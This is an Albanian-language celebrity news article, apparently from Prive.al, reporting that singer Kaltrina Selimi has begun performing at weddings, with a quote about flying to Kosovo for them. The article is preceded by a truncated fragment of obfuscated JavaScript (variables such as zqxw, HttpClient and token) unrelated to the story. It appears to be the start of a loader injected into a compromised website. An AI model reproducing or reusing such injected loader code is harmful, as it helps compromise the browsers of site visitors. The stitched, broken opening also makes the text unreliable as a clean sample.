;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kaltrina Selimi ka nisur të këndojë edhe në dasma?!

By

Njihet me karrierë muzikore ku baladat dhe këngët më komerciale spikasin por duket se kapaciteti vokal që nuk i mungon ka bërë që Kaltrina Selimi të mos limitohet vetëm në këtë pjesë.

Sipas të gjitha gjasave, këngëtarja e njohur i është bashkuar ‘valles’ së dhjetëra këngëtareve që pos koncerteve, në agjendën e tyre kanë edhe dasma.

Lajmi ‘bombë’ u tha për të parën herë në NIN me Alaudin Hamitin ku si e ftuar për të promovuar bashkë me Gold AG, duetin e ri, Kaltrina bëri me dije se nuk po i mungojnë as dasmat.

E pyetur se sa është e vështirë të ketë koordinim shkaku i distancës së madhe gjeografike, Selimi u shpreh: ‘Më njoftojnë pak më herët dhe nuk është aspak problem. Për tre orë jam në Kosovë meqenëse ka edhe fluturime të shpeshta’.

Ndryshe nga shumë kolege që verës ‘vërshuan’ me postime ku shfaqin atmosferën e mirë në dasmat që iu besohen, duket se Kaltrina ka zgjedhur ta zhvillojë veprimtarinë pa shumë pompozitet. /Prive.al/

Artikuj të ngjashëm